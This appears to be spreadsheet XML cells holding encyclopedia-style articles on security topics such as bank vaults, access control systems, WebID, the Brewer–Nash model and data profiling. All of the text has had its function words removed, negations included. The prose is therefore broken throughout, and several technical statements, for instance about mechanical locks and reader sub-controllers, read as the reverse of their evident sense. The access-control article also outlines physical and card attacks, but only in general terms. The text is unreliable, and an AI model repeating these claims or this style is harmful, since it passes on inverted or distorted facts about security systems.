°c). thermal lance user bores series small holes eventually linked form gap. vault manufacturers work closely banking industry enforcement order keep advances burglary. references further reading books steele, sean heists: swindles, stickups, robberies shocked world. york: metrobooks, 1995. isbn 1-56799-170-x. tchudi, stephen, lock key: secrets locking things out. york: charles scribner's sons, 1993. isbn 0-684-19363-9. periodicals chiles, james "age-old battle keep safes safe 'creepers, soup yeggs". smithsonian (july 1984): 35–44. merrick, amy, "immovable objects, they're bank vaults, make nice restaurants". wall street journal february 2001): external links bank vault anatomy wayback machine (archived march 2016) semi-technical guide bank vaults built early 1900s; includes remote combination viewer vault information most impenetrable bank vaults", accessed december 2010. "bank vault (madehow.com)", accessed december 2010. 380-5 chapter safekeeping storage", u.s. standard secret material storage displayed federation american scientists, accessed december 2010. "operating instruction x-09 type high security electronic lock", u.s. naval facilities engineering command, accessed december 2010.</t>
  </si>
  <si>
    <t>Oracle Identity Management</t>
  </si>
  <si>
    <t>oracle identity management, software suite marketed oracle corporation, provides identity access management (iam) technologies. name software suite closely resembles name components, oracle identity manager. components rebranding after oracle acquired microsystems, re-branded number products overlapped function. (see table below.) re-branding, oracle's commitment ongoing support maintenance products revealed hasan rizvi, senior vice president oracle fusion middleware oracle identity management strategy webcast 2010. other information originally, earlier versions, java-based portions suite mainly oc4j, although components (e.g. oim) supported j2ee appservers. version, oracle corporation ported oc4j-based components weblogic. november 2008 software undergoing common criteria evaluation process.in march 2005 oracle acquired oblix incorporated access control software oracle identity management. also oracle directory server enterprise edition oracle internet directory oracle technology network oracle fusion middleware references external links oracle identity management identity theft protection</t>
  </si>
  <si>
    <t>Yandex.Metrica</t>
  </si>
  <si>
    <t>yandex metrica (russian: яндекс метрика yandeks metrika; stylised yandex.metrica) free analytics service offered yandex tracks reports website traffic. yandex launched service 2008 made public 2009.as 2019, yandex.metrica third widely used analytics service web. features yandex.metrica uses simple javascript webmaster implements website. collects audience, traffic, behaviour data website. metrica also linked yandex.direct online advertising platform collect conversion rate. also google analytics list analytics software references external links official website official blog russian)</t>
  </si>
  <si>
    <t>BarWatch</t>
  </si>
  <si>
    <t>barwatch self regulated associations bars, nightclubs restaurants across canada. members barwatch association draft regulations security practices members goal reducing violence costs associated members vote regulations enhance security installation video cameras, greater communication local enforcement, scanners bars nightclubs. barwatch sometimes mistakenly used refer scanning software used members barwatch association. however, scanning software actually offered separate private companies servall data systems. subscribers scanning systems photograph scan government issued cards patrons collecting information name, photograph [1]. intent prevent people engaging criminal activity bars nightclubs creating database known incidents. there controversy legality systems.in 2009, legislative assembly alberta voted passed bill allowing bars nightclubs collect person's name, age, photograph, contradict alberta's privacy legislation. bill permit bars nightclubs collect additional information, including address driver's license number, permit scanning driver's licenses. alberta gaming liquor commission also released guidelines scanning systems license holders [3], also clarifies scan photocopy entire face patron's driver's license". shortly afterward, privacy commissioner british columbia followed alberta's guidelines passed similar guidelines bars nightclubs. references external links servall data systems, provider scanners bars nightclubs bill official legislation alberta allowing bars nightclubs scan aglc guidelines, official guidelines scanning alberta 2009 article clearer rules needed scanning regulations</t>
  </si>
  <si>
    <t>Accredited Symbian Developer</t>
  </si>
  <si>
    <t>accredited symbian developer (asd) (now defunct) accreditation program software developers using symbian mobile phone operating system, terminated april 2011 closure symbian foundation. scheme operated independently foundation's behalf majinate limited, also closed business foundation closed. qualifications required primary qualification accredited pass on-line multiple choice examination adhered principles symbian curriculum. this curriculum reviewed annual basis ensure accreditation kept date developments symbian operating system. final release curriculum made 2009 although still adhered closely primer, learning published wiley symbian press imprint. curriculum final version curriculum contained following major topics: language fundamentals classes objects class design inheritance symbian types declarations cleanup stack object construction descriptors dynamic arrays active objects system structure client server file server, store streams sockets tool chain platform security binary compatibilityeach topic assessed marked separately examination pass required high score coverage majority topics. also software development software engineering software development process computer video game development external links symbian developer website symbian foundation website</t>
  </si>
  <si>
    <t>Briar (software)</t>
  </si>
  <si>
    <t>briar open-source software communication technology, intended provide secure resilient peer-to-peer communications centralized servers minimal reliance external infrastructure. messages transmitted bluetooth, wifi, internet removable storage, sticks. communication end-to-end encrypted. relevant content stored encrypted form participating devices. long-term plans project include support distributed applications crisis mapping collaborative document editing. initial target audience briar includes "activists, journalists civil society" plans make system "simple enough help anyone keep data safe." ability function absence internet infrastructure also make project valuable disaster response organizations, developers working open humanitarian initiative taarifa. ultimately, developers create system simple whatsapp, secure pgp, keeps working somebody breaks internet."briar's source code published free software mobile distributed terms gpl-3.0-or-later license, desktop version released affero general public license. audited cure53 spoken highly report delivered march 2017, recommended given second audit development completes.as 2018 project received $361,100 funding open technology fund. also mesh networking smartphone network specific projects/protocols b.a.t.m.a.n. jami (software) serval project (protocol) bridgefy references external links official website</t>
  </si>
  <si>
    <t>Piggyback attack</t>
  </si>
  <si>
    <t>piggyback attack active form wiretapping attacker gains access system intervals inactivity another user's legitimate connection. also called “between line attack” "piggyback-entry wiretapping".in security, piggybacking refers someone tags along another person authorized gain entry restricted area term applied computer networks context. references</t>
  </si>
  <si>
    <t>Aces of ANSI Art</t>
  </si>
  <si>
    <t>aces ansi (abbreviated &lt;a.a.a&gt;) first group artists specifically organized purposes creating distributing ansi art. group founded operated enthusiasts california, "zyphril" "chips ahoy", 1989 1991. history group initially formed 1989 era, soon group's founding, ansi groups took life own, growing increasingly popular spawning would come known "artscene." ansi art, initially began method bulletin board sysops draw users boards, emergence organized groups, artscene became associated "underground" culture, warez boards.in 1990, schism occurred small influential group members left group form acid productions. acid (ansi creators demand) grew become first international artscene group. membership also further reading danet, brenda. "cyberpl@y: communicating online". oxford, berg publishers, 2001. isbn 1-85973-424-3. "dark domain: artpacks.acid.org collection" (dvd-rom). jose, usa: acid productions, llc, 2004. isbn 0-9746537-0-5. hacker chronicles, cd-rom, produced distributed p-80 systems. scott, jason. "bbs: documentary" (dvd). boston, usa: bovine ignition systems, 2005. wands, bruce (2006). digital age, london: thames hudson. isbn 0-500-23817-0. zetter, kim. "how humble begat wired world". wired news. june 2005. retrieved october 2005. references external links examples ansi artwork aces ansi classics, youtube video featuring animations 1991 members artscene.textfiles.com, artscene branch textfiles.com library. darkdomain.org, dark domain (2004). archive hosts complete collection underground artscene works 1987 2003. roy/sac text artist- superior creations, information ascii styles, packs download sixteen colors ansi ascii archive viewable archive current past ansi ascii packs released computer scene more history scene bbs: documentary episode documents rise scene releases aces ansi remembrance pack archive ansi artwork created various members group 1989 1991.</t>
  </si>
  <si>
    <t>Project DReaM</t>
  </si>
  <si>
    <t>project dream microsystems project aimed developing open interoperable architecture implements standardized interfaces. primary goal creation royalty-free digital rights management industry standard. august 2005, announced opening project dream, started internal research project, part open media commons initiative. released common development distribution license (cddl). inactivity project, closed archived august 2008. dream acronym stands "drm everywhere/available". project dream included java stream assembly support digital video management distribution, hardware- operating system-independent interoperable standard called drm-opera, streaming server stream video audio characteristics project dream follows: network identity focus: project dream approaches (and cas) network identity management-focused perspective, rather device-centric approach. interoperability: project dream uses open approach fully specifies everything necessary build heterogeneous, interoperable, vendor neutral implementations. reliance security obscurity: project dream's architecture follow traditional model security obscurity must maintain closed source code base order operate securely. royalty-free design model: project dream designed royalty free, allowing developers avoid encumbered technology carries onerous licensing costs.project dream technology required software code signed trusted computing hardware, unauthorized unsigned code cannot run. this approach criticized journalist cory doctorow, characterized project dream crippleware. project dream favorably mentioned mike linksvayer 2008 article discussing support fair creative commons-licensed content. also open media commons references external links openmediacommons.org website project dream press release</t>
  </si>
  <si>
    <t>WebID</t>
  </si>
  <si>
    <t>webid method internet services members know communicating with. webid specifications define editor's drafts prepare process standardization identity, identification authentication http-based networks. webid-based protocols (solid oidc, webid-tls, webid-tls+delegation) offer internet services. instead using password, example, member refers another address vouch webid specific service product. technically speaking, webid http denotes ("refers "names") agent http based network enterprise intranet. line linked data principles, webid de-referenced ("looked up"), resolves profile document webid-profile) describes referent (what denotes). this profile document consists model based structured data, originally constructed primarily using terms foaf vocabulary, often including terms vocabularies. profile documents stored agent's server, access thereto partially wholly constrained specific agent identities access controls, preserve privacy profile document's subject. protocols webid-tls webid-tls protocol (formerly known foaf+ssl) decentralized secure authentication protocol built upon profile information well transport layer security (tls) client certificates available virtually modern browsers. first presented workshop future social networking 2009. unlike usual usage patterns, webid-tls require dedicated certificate authority perform user authorization. users easily mint useful identities using certificate (even self-signed ones). using client certificates site user authentication usually require user input password, unlike many single sign-on mechanisms, make webid-tls quite convenient. however, client certificate selection dialogues popular browsers user-friendly might negating convenience. trust based webid-tls could gradually constructed, connecting users activities world wide web, without formal signing parties, making identification harder anyone (even original issuing authority) falsify. webid-oidc webid-oidc authentication delegation protocol used solid. based decentralized oauth2/openid connect. superseded solid oidc solid oidc solid oidc authentication delegation protocol used solid. based oauth2/openid connect. webid-tls+delegation webid-tls+delegation extends webid-tls behalf headers relationships, enabling agent permissions/privileges another agent. also authorization indieauth openid openid connect (oidc) webfinger references external links official website</t>
  </si>
  <si>
    <t>Brewer and Nash model</t>
  </si>
  <si>
    <t>brewer nash model constructed provide information security access controls change dynamically. this security model, also known chinese wall model, designed provide controls mitigate conflict interest commercial organizations built upon information flow model. brewer nash model, information flow subjects objects would create conflict interest. this model commonly used consulting accounting firms. example, consultant accesses data belonging acme ltd, consulting client, longer access data acme's competitors. model, consulting firm clients competing acme advising acme ltd. this model uses principle data isolation within conflict class data keep users potential conflict interest situations. because company relationships change time, dynamic up-to-date updates members definitions conflict classes important. also bell–lapadula model biba model clark–wilson model graham–denning model references harris, shon, all-in-one cissp exam guide, third edition, mcgraw hill osborne, emeryville, california, 2005. chapple, mike, certified information system security professional official study guide, eighth edition, sybex, john wiley sons, indiana, 2018. external links david f.c. brewer michael nash (1989). "the chinese wall security policy" (pdf). proceedings ieee symposium security privacy, 1989, 206-214. ieee.</t>
  </si>
  <si>
    <t>Access control</t>
  </si>
  <si>
    <t>fields physical security information security, access control (ac) selective restriction access place resource, access management describes process. accessing mean consuming, entering, using. permission access resource called authorization. locks login credentials analogous mechanisms access control. physical security geographical access control enforced personnel (e.g. border guard, bouncer, ticket checker), device turnstile. there fences avoid circumventing access control. alternative access control strict sense (physically controlling access itself) system checking authorized presence, e.g. ticket controller (transportation). variant exit control, e.g. shop (checkout) country.the term access control refers practice restricting entrance property, building, room authorized persons. physical access control achieved human guard, bouncer, receptionist), mechanical means locks keys, technological means access control systems like mantrap. within environments, physical management also employed means managing monitoring access mechanically keyed areas access certain small assets.physical access control matter who, where, when. access control system determines allowed enter exit, allowed exit enter, allowed enter exit. historically, partially accomplished keys locks. when door locked, someone enter door, depending lock configured. mechanical locks keys allow restriction holder specific times dates. mechanical locks keys provide records used specific door, keys easily copied transferred unauthorized person. when mechanical lost holder longer authorized protected area, locks must re-keyed. electronic access control electronic access control (eac) uses computers solve limitations mechanical locks keys. wide range credentials used replace mechanical keys. electronic access control system grants access based credential presented. when access granted, door unlocked predetermined time transaction recorded. when access refused, door remains locked attempted access recorded. system also monitor door alarm door forced open held open long unlocked.when credential presented reader, reader sends credential's information, usually number, control panel, highly reliable processor. control panel compares credential's number access control list, grants denies presented request, sends transaction database. when access denied based access control list, door remains locked. match credential access control list, control panel operates relay turn unlocks door. control panel also ignores door open signal prevent alarm. often reader provides feedback, flashing access denied flashing green access granted.the description illustrates single factor transaction. credentials passed around, thus subverting access control list. example, alice access rights server room, not. alice either gives credential, takes access server room. prevent this, two-factor authentication used. factor transaction, presented credential second factor needed access granted; another factor pin, second credential, operator intervention, biometric input.there three types (factors) authenticating information: something user knows, e.g. password, pass-phrase something user has, smart card something user fingerprint, verified biometric measurementpasswords common means verifying user's identity access given information systems. addition, fourth factor authentication recognized: someone know, whereby another person knows provide human element authentication situations systems allow scenarios. example, user password, forgotten smart card. scenario, user known designated cohorts, cohorts provide smart card password, combination extant factor user question, thus provide factors user missing credential, giving three factors overall allow access. credential credential physical/tangible object, piece knowledge, facet person's physical enables individual access given physical facility computer-based information system. typically, credentials something person knows (such number pin), something (such access badge), something (such biometric feature), something (measurable behavioural patterns), combination items. this known multi-factor authentication. typical credential access card key-fob, newer software also turn users' smartphones access devices.there many card technologies including magnetic stripe, code, wiegand, proximity, 26-bit card-swipe, contact smart cards, contactless smart cards. also available key-fobs, compact cards, attach ring. biometric technologies include fingerprint, facial recognition, iris recognition, retinal scan, voice, hand geometry. built-in biometric technologies found newer smartphones also used credentials conjunction access software running mobile devices. addition older traditional card access technologies, newer technologies near field communication (nfc), bluetooth energy ultra-wideband (uwb) also communicate user credentials readers system building access. access control system components components access control system include: access control panel (also known controller) access-controlled entry, door, turnstile, parking gate, elevator, physical barrier reader installed near entry. cases exit also controlled, second reader used opposite side entry.) locking hardware, electric door strikes electromagnetic locks magnetic door switch monitoring door position request-to-exit (rte) devices allowing egress. when button pushed, motion detector detects motion door, door alarm temporarily ignored door opened. exiting door without electrically unlock door called mechanical free egress. this important safety feature. cases lock must electrically unlocked exit, request-to-exit device also unlocks door. access control topology access control decisions made comparing credentials access control list. this look-up done host server, access control panel, reader. development access control systems observed steady push look-up central host edge system, reader. predominant topology circa 2009 spoke control panel hub, readers spokes. look-up control functions control panel. spokes communicate serial connection; usually rs-485. some manufactures pushing decision making edge placing controller door. controllers enabled, connect host database using standard networks types readers access control readers classified functions able perform: basic (non-intelligent) readers: simply read card number pin, forward control panel. case biometric identification, readers output number user. typically, wiegand protocol used transmitting data control panel, options rs-232, rs-485 clock/data uncommon. this popular type access control readers. examples readers tiny rflogics, proxpoint hid, p300 farpointe data. semi-intelligent readers: inputs outputs necessary control door hardware (lock, door contact, exit button), make access decisions. when user presents card enters pin, reader sends information main controller, waits response. connection main controller interrupted, readers stop working, function degraded mode. usually semi-intelligent readers connected control panel rs-485 bus. examples readers infoprox lite ipl200 systems, ap-510 apollo. intelligent readers: inputs outputs necessary control door hardware; also memory processing power necessary make access decisions independently. like semi-intelligent readers, connected control panel rs-485 bus. control panel sends configuration updates, retrieves events readers. examples readers could infoprox ipo200 systems, ap-500 apollo. there also generation intelligent readers referred readers". systems readers usually traditional control panels, readers communicate directly acts host.some readers additional features function buttons data collection purposes (i.e. clock-in/clock-out events attendance reports), camera/speaker/microphone intercom, smart card read/write support. access control system topologies serial controllers. controllers connected host serial rs-485 communication line 20ma current loop older systems). external rs-232/485 converters internal rs-485 cards installed, standard rs-485 communication ports.advantages: rs-485 standard allows long cable runs, 4000 feet (1200 relatively short response time. maximum number devices rs-485 line limited means host frequently request status updates device, display events almost real time. high reliability security communication line shared systems.disadvantages: rs-485 allow star-type wiring unless splitters used rs-485 well suited transferring large amounts data (i.e. configuration users). highest possible throughput 115.2 kbit/sec, system downgraded 56.2 kbit/sec, less, increase reliability. rs-485 allow host communicate several controllers connected port simultaneously. therefore, large systems, transfers configuration, users controllers take long time, interfering normal operations. controllers cannot initiate communication case alarm. host acts master rs-485 communication line, controllers wait polled. special serial switches required, order build redundant host setup. separate rs-485 lines installed, instead using already existing network infrastructure. cable meets rs-485 standards significantly expensive regular category network cable. operation system highly dependent host case host fails, events controllers retrieved, functions require interaction controllers (i.e. anti-passback) stop working. serial main sub-controllers. door hardware connected sub-controllers (a.k.a. door controllers door interfaces). sub-controllers usually make access decisions, instead forward requests main controllers. main controllers usually support sub-controllers. advantages: work load host significantly reduced, needs communicate main controllers. overall cost system lower, sub-controllers usually simple inexpensive devices. advantages listed first paragraph apply.disadvantages: operation system highly dependent main controllers. case main controllers fails, events sub-controllers retrieved, functions require interaction sub-controllers (i.e. anti-passback) stop working. some models sub-controllers (usually lower cost) memory processing power make access decisions independently. main controller fails, sub-controllers change degraded mode doors either completely locked unlocked, events recorded. such sub-controllers avoided, used areas require high security. main controllers tend expensive, therefore topology well suited systems multiple remote locations doors. rs-485-related disadvantages listed first paragraph apply. serial main controllers intelligent readers. door hardware connected directly intelligent semi-intelligent readers. readers usually make access decisions, forward requests main controller. only connection main controller unavailable, readers internal database make access decisions record events. semi-intelligent reader database cannot function without main controller used areas require high security. main controllers usually support readers. advantages disadvantages ones listed second paragraph. serial controllers terminal servers. spite rapid development increasing computer networks, access control manufacturers remained conservative, rush introduce network-enabled products. when pressed solutions network connectivity, many chose option requiring less efforts: addition terminal server, device converts serial data transmission wan. advantages: allows utilizing existing network infrastructure connecting separate segments system. provides convenient solution cases installation rs-485 line would difficult impossible.disadvantages: increases complexity system. creates additional work installers: usually terminal servers configured independently, interface access control software. serial communication link controller terminal server acts bottleneck: even though data host terminal server travels 10/100/1000mbit/sec network speed, must slow serial speed 112.5 kbit/sec less. there also additional delays introduced process conversion serial network data.all rs-485-related advantages disadvantages also apply. network-enabled main controllers. topology nearly described second third paragraphs. advantages disadvantages apply, on-board network interface offers couple valuable improvements. transmission configuration user data main controllers faster, done parallel. this makes system responsive, interrupt normal operations. special hardware required order achieve redundant host setup: case primary host fails, secondary host start polling network controllers. disadvantages introduced terminal servers (listed fourth paragraph) also eliminated. controllers. controllers connected host ethernet wan. advantages: existing network infrastructure fully utilized, need install communication lines. there limitations regarding number controllers line cases rs-485). special rs-485 installation, termination, grounding troubleshooting knowledge required. communication controllers done full network speed, important transferring data (databases thousands users, possibly including biometric records). case alarm, controllers initiate connection host this ability important large systems, serves reduce network traffic caused unnecessary polling. simplifies installation systems consisting multiple sites separated large distances. basic internet link sufficient establish connections remote locations. wide selection standard network equipment available provide connectivity various situations (fiber, wireless, vpn, dual path, poe)disadvantages: system becomes susceptible network related problems, delays case heavy traffic network equipment failures. access controllers workstations become accessible hackers network organization well protected. this threat eliminated physically separating access control network network organization. most controllers utilize either linux platform proprietary operating systems, makes difficult hack. industry standard data encryption also used. maximum distance switch controller using copper cable) meters (330 ft). operation system dependent host case host fails, events controllers retrieved functions require interaction controllers (i.e. anti-passback) stop working. some controllers, however, peer-to-peer communication option order reduce dependency host readers. readers connected host ethernet wan. advantages: most readers capable. this feature makes easy provide battery backed power entire system, including locks various types detectors used). readers eliminate need controller enclosures. there wasted capacity using readers (e.g. 4-door controller would unused capacity controlling doors). reader systems scale easily: need install main sub-controllers. failure reader affect readers system.disadvantages: order used high-security areas, readers require special input/output modules eliminate possibility intrusion accessing lock and/or exit button wiring. reader manufacturers modules available. being sophisticated basic readers, readers also expensive sensitive, therefore installed outdoors areas harsh weather conditions, high probability vandalism, unless specifically designed exterior installation. manufacturers make models.the advantages disadvantages controllers apply readers well. security risks common security risk intrusion access control system simply following legitimate user door, referred tailgating. often legitimate user hold door intruder. this risk minimized security awareness training user population active means turnstiles. high-security applications risk minimized using sally port, sometimes called security vestibule mantrap, operator intervention required presumably assure valid identification.the second common risk levering door open. this relatively difficult properly secured doors strikes high holding force magnetic locks. fully implemented access control systems include forced door monitoring alarms. these vary effectiveness, usually failing high false positive alarms, poor database configuration, lack active intrusion monitoring. most newer access control systems incorporate type door prop alarm inform system administrators door left open longer specified length time.the third common security risk natural disasters. order mitigate risk natural disasters, structure building, quality network computer equipment vital. from organizational perspective, leadership need adopt implement hazards plan, incident response plan. highlights incident plan determined national incident management system must include pre-incident planning, incident actions, disaster recovery, after-action review.similar levering crashing cheap partition walls. shared tenant spaces, divisional wall vulnerability. vulnerability along lines breaking sidelights.spoofing locking hardware fairly simple elegant levering. strong magnet operate solenoid controlling bolts electric locking hardware. motor locks, prevalent europe also susceptible attack using doughnut-shaped magnet. also possible manipulate power lock either removing adding current, although access control systems incorporate battery back-up systems locks almost always located secure side door.access cards proven vulnerable sophisticated attacks. enterprising hackers built portable readers capture card number user's proximity card. hacker simply walks user, reads card, presents number reader securing door. this possible card numbers sent clear, encryption used. counter this, dual authentication methods, card plus always used. many access control credentials unique serial numbers programmed sequential order manufacturing. known sequential attack, intruder credential used system simply increment decrement serial number find credential currently authorized system. ordering credentials random unique serial numbers recommended counter threat.finally, electric locking hardware still mechanical keys fail-over. mechanical locks vulnerable bumping. need-to-know principle need know principle enforced user access controls authorization procedures objective ensure authorized individuals gain access information systems necessary undertake duties. computer security computer security, general access control includes authentication, authorization, audit. narrow definition access control would cover access approval, whereby system makes decision grant reject access request already authenticated subject, based subject authorized access. authentication access control often combined single operation, access approved based successful authentication, based anonymous access token. authentication methods tokens include passwords, biometric analysis, physical keys, electronic keys devices, hidden paths, social barriers, monitoring humans automated systems.in access-control model, entities perform actions system called subjects, entities representing resources access need controlled called objects (see also access control matrix). subjects objects considered software entities, rather human users: human users effect system software entities control.although systems equate subjects user ids, processes started user default authority, level control fine-grained enough satisfy principle least privilege, arguably responsible prevalence malware systems (see computer insecurity).in models, example object-capability model, software entity potentially subject object.as 2014, access-control models tend fall classes: based capabilities based access control lists (acls). capability-based model, holding unforgeable reference capability object provides access object (roughly analogous possession one's house grants access one's house); access conveyed another party transmitting capability secure channel acl-based model, subject's access object depends whether identity appears list associated object (roughly analogous bouncer private party would check name appears guest list); access conveyed editing list. (different systems variety different conventions regarding responsible editing list edited.)both capability-based acl-based models mechanisms allow access rights granted members group subjects (often group modeled subject).access control systems provide essential services authorization, identification authentication (i&amp;a), access approval, accountability where: authorization specifies subject identification authentication ensure legitimate subjects system access approval grants access operations, association users resources allowed access, based authorization policy accountability identifies subject subjects associated user) access control models access accounts enforced many types controls. attribute-based access control (abac) access control paradigm whereby access rights granted users policies evaluate attributes (user attributes, resource attributes environment conditions) discretionary access control (dac)in dac, data owner determines access specific resources. example, system administrator create hierarchy files accessed based certain permissions. graph-based access control (gbac)compared approaches like rbac abac, main difference gbac access rights defined using organizational query language instead total enumeration. history-based access control (hbac)access granted declined based real-time evaluation history activities inquiring party, e.g. behavior, time requests, content requests. example, access certain service data source granted declined personal behavior, e.g. request interval exceeds query second. history-of-presence based access control (hpbac)access control resources defined terms presence policies need satisfied presence records stored requestor. policies usually written terms frequency, spread regularity. example policy would "the requestor made separate visitations, within last week, consecutive visitations apart hours." identity-based access control (ibac)using network administrators effectively manage activity access based individual needs. lattice-based access control (lbac)a lattice used define levels security object subject access subject allowed access object security level subject greater equal object. mandatory access control (mac)in mac, users much freedom determine access files. example, security clearance users classification data confidential, secret secret) used security labels define level trust. organization-based access control (orbac) orbac model allows policy designer define security policy independently implementation role-based access control (rbac)rbac allows access based title. rbac largely eliminates discretion providing access objects. example, human resources specialist permissions create network accounts; role reserved network administrators. rule-based access control (rac)rac method, also referred rule-based role-based access control (rb-rbac), largely context based. example would allowing students labs certain time day; combination students' rbac-based information system access control time-based access rules. responsibility based access control information accessed based responsibilities assigned actor business role telecommunication telecommunication, term access control defined u.s. federal standard 1037c following meanings: service feature technique used permit deny components communication system. technique used define restrict rights individuals application programs obtain data from, place data onto, storage device. definition restriction rights individuals application programs obtain data from, place data into, storage device. process limiting access resources (automated information system) authorized users, programs, processes, systems. that function performed resource controller allocates system resources satisfy user requests.this definition depends several technical terms federal standard 1037c. attribute accessors special public member methods accessors (aka getters) mutator methods (often called setters) used control changes class variables order prevent unauthorized access data corruption. public policy public policy, access control restrict access systems ("authorization") track monitor behavior within systems ("accountability") implementation feature using trusted systems security social control. also alarm device, alarm management, security alarm card reader, common access card, magnetic stripe card, proximity card, smart card, optical turnstile, access badge castle, fortification computer security, logical security, .htaccess, wiegand effect, xacml, credential door security, lock picking, lock (security device), electronic lock, safe, safe-cracking, bank vault fingerprint scanner, photo identification, biometrics management, cards lock screen physical security information management physical security professional prison, barbed tape, mantrap security, security engineering, security lighting, security management, security policy references u.s. federal 1037c u.s. mil-188 u.s. national information systems security glossary harris, shon, all-in-one cissp exam guide, edition, mcgraw hill osborne, emeryville, california, 2012. "integrated security systems design" butterworth/heinenmann 2007 thomas norman, cpp/psp/csc author nist.gov computer security division computer security resource center attribute based access control (abac) overview external links access control markup language. oasis standard language/model access control. also xacml.</t>
  </si>
  <si>
    <t>RFPolicy</t>
  </si>
  <si>
    <t>rfpolicy states method contacting vendors security vulnerabilities found products. originally written hacker security consultant rain forest puppy.the policy gives vendor five working days respond reporter bug. vendor fails contact reporter five days, issue recommended disclosed general community. reporter help vendor reproduce work fix. reporter delay notifying general community vendor provides feasible reasons requiring vendor fails respond shuts communication reporter problem five working days, reporter disclose issue general community. when issuing alert fix, vendor give reporter proper credits reporting bug. references external links rfpolicy v2.0</t>
  </si>
  <si>
    <t>Access control matrix</t>
  </si>
  <si>
    <t>computer science, access control matrix access matrix abstract, formal security model protection state computer systems, characterizes rights subject respect every object system. first introduced butler lampson 1971.an access matrix envisioned rectangular array cells, subject column object. entry cell entry particular subject-object pair indicates access mode subject permitted exercise object. each column equivalent access control list object; equivalent access profile subject. definition according model, protection state computer system abstracted objects {\displaystyle entities needs protected (e.g. processes, files, memory pages) subjects {\displaystyle consists active entities (e.g. users, processes). further exists rights {\displaystyle form {\displaystyle r(s,o)} {\displaystyle s\in {\displaystyle o\in {\displaystyle r(s,o)\subseteq right thereby specifies kind access subject allowed process object. example matrix example exist processes, assets, file, device. first process owner asset ability execute asset read file, write information device, second process owner asset read asset utility because define granularity protection mechanisms, access control matrix used model static access permissions type access control system. model rules permissions change particular system, therefore gives incomplete description system's access control security policy. access control matrix thought abstract model permissions given point time; literal implementation two-dimensional array would excessive memory requirements. capability-based security access control lists categories concrete access control mechanisms whose static permissions modeled using access control matrices. although mechanisms sometimes presented (for example butler lampson's protection paper) simply row-based column-based implementations access control matrix, view criticized drawing misleading equivalence systems take account dynamic behaviour. also access control list (acl) capability-based security computer security model computer security policy references bishop, matt (2004). computer security: science. addison-wesley. isbn 0-201-44099-7.</t>
  </si>
  <si>
    <t>Profiling (information science)</t>
  </si>
  <si>
    <t>information science, profiling refers process construction application user profiles generated computerized data analysis. this algorithms mathematical techniques allow discovery patterns correlations large quantities data, aggregated databases. when patterns correlations used identify represent people, called profiles. other discussion profiling technologies population profiling, notion profiling sense construction profiles, also concerns application group profiles individuals, cases credit scoring, price discrimination, identification security risks (hildebrandt gutwirth 2008) (elmer 2004). profiling used fraud prevention, ambient intelligence, consumer analytics. statistical methods profiling include knowledge discovery databases (kdd). profiling process technical process profiling separated several steps: preliminary grounding: profiling process starts specification applicable problem domain identification goals analysis. data collection: target dataset database analysis formed selecting relevant data light existing domain knowledge data understanding. data preparation: data preprocessed removing noise reducing complexity eliminating attributes. data mining: data analysed algorithm heuristics developed suit data, model goals. interpretation: mined patterns evaluated relevance validity specialists and/or professionals application domain (e.g. excluding spurious correlations). application: constructed profiles applied, e.g. categories persons, test fine-tune algorithms. institutional decision: institution decides actions policies apply groups individuals whose data match relevant profile.data collection, preparation mining belong phase profile construction. however, profiling also refers application profiles, meaning usage profiles identification categorization groups individual persons. seen step (application), process circular. there feedback loop construction application profiles. interpretation profiles lead reiterant possibly real-time fine-tuning specific previous steps profiling process. application profiles people whose data used construct profile based data matching, provides data allows adjustments. process profiling dynamic adaptive. good illustration dynamic adaptive nature profiling cross-industry standard process data mining (crisp-dm). types profiling practices order clarify nature profiling technologies, crucial distinctions made different types profiling practices, apart distinction construction application profiles. main distinctions bottom-up top-down profiling supervised unsupervised learning), individual group profiles. supervised unsupervised learning profiles classified according generated (fayyad, piatetsky-shapiro smyth 1996) (zarsky 2002-3). hand, profiles generated testing hypothesized correlation. this called top-down profiling supervised learning. this similar methodology traditional scientific research starts hypothesis consists testing validity. result type profiling verification refutation hypothesis. could also speak deductive profiling. hand, profiles generated exploring data base, using data mining process detect patterns data base previously hypothesized. way, matter generating hypothesis: finding correlations expect even think once patterns mined, enter loop described tested data. this called unsupervised learning. things important regard distinction. first, unsupervised learning algorithms seem allow construction type knowledge, based hypothesis developed researcher based causal motivational relations exclusively based stochastical correlations. second, unsupervised learning algorithms thus seem allow inductive type knowledge construction require theoretical justification causal explanation (custers 2004). some authors claim application profiles based computerized stochastical pattern recognition 'works', i.e. allows reliable predictions future behaviours, theoretical causal explanation patterns matter anymore (anderson 2008). however, idea 'blind' algorithms provide reliable information imply information neutral. process collecting aggregating data database (the first three steps process profile construction), translations made real-life events machine-readable data. these data prepared cleansed allow initial computability. potential bias located points, well choice algorithms developed. possible mine database possible linear non-linear correlations, meaning mathematical techniques developed search patterns determinate patterns found. case machine profiling, potential bias informed common sense prejudice psychologists call stereotyping, computer techniques employed initial steps process. these techniques mostly invisible profiles applied (because data match relevant group profiles). individual group profiles profiles must also classified according kind subject refer this subject either individual group people. when profile constructed data single person, called individual profiling (jaquet-chiffelle 2008). this kind profiling used discover particular characteristics certain individual, enable unique identification provision personalized services. however, personalized servicing often also based group profiling, allows categorisation person certain type person, based fact profile matches profile constructed basis massive amounts data massive numbers people. group profile refer result data mining data sets refer existing community considers such, like religious group, tennis club, university, political party etc. case describe previously unknown patterns behaviour characteristics group (community). group profile also refer category people form community, found share previously unknown patterns behaviour characteristics (custers 2004). case group profile describes specific behaviours characteristics category people, like instance women blue eyes hair, adults relatively short arms legs. these categories found correlate health risks, earning capacity, mortality rates, credit risks, etc. individual profile applied individual mined from, direct individual profiling. group profile applied individual whose data match profile, indirect individual profiling, profile generated using data people. similarly, group profile applied group mined from, direct group profiling (jaquet-chiffelle 2008). however, application group profile group implies application group profile individual members group, makes sense speak indirect group profiling, especially group profile non-distributive. distributive non-distributive profiling group profiles also divided terms distributive character (vedder 1999). group profile distributive properties apply equally members group: bachelors unmarried, persons specific gene chance contract specific disease. profile non-distributive profile necessarily apply members group: group persons specific postal code average earning capacity category persons blue eyes average chance contract specific disease. note case chance individual particular earning capacity contract specific disease depend factors, e.g. sex, age, background parents, previous health, education. obvious that, apart tautological profiles like bachelors, group profiles generated means computer techniques non-distributive. this far-reaching implications accuracy indirect individual profiling based data matching non-distributive group profiles. quite apart fact application accurate profiles unfair cause undue stigmatisation, group profiles accurate. applications financial sector, institutions profiling technologies fraud prevention credit scoring. banks want minimize risks giving credit customers. basis extensive group, profiling customers assigned certain scoring value indicates creditworthiness. financial institutions like banks insurance companies also group profiling detect fraud money-laundering. databases transactions searched algorithms find behaviors deviate standard, indicating potentially suspicious transactions.in context employment, profiles tracking employees monitoring 